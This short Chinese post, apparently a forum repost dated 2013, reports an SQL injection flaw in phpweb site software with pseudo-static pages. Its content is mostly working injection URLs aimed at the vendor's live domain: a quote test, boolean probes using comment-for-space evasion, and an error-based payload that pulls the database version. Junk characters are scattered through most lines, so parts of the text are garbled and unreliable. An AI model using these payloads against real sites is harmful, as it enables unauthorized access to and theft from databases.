phpweb所有的整站程序伪静态页面都存在sql注入
8 I Y9 _/ O/ U1 Q- M
1 S# O$ \4 i$ A% n. j1 G8 A! l- w主站:http://phpweb.net/6 U! W" z9 u9 X% Y
加’检测:, |! n5 M* _; V3 x' J
8 x. O7 | X2 X8 C% [
http://www.phpweb.net/down/html/?772′.html; [$ e, E7 D( G
5 w6 i; d& @7 w) m: B3 ]
出错5 n! c" o8 w( g! M+ O9 `
存在注入。1 H! T! J$ J; u9 e1 N6 |
不能用空格,只能用/*罗
' H$ W3 ~7 A0 |: s( @5 Thttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
4 i1 C8 i" c" T, A6 i
6 Q! t, E: T) Y. K+ d8 M4 j; ahttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
K1 q" z* B3 i- b爆数据库版本:! ?- n* b$ Q, }+ D9 C
; v% t0 J, w9 H& c
?
1 o7 r3 W' g6 m8 ^& m' u1: q! M7 D" W3 i q& Z) G& U
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html) S1 Y: r: v7 q" H# f
更新日期: 2013-01-03 13:39:50
1 x* @% T z0 S) o |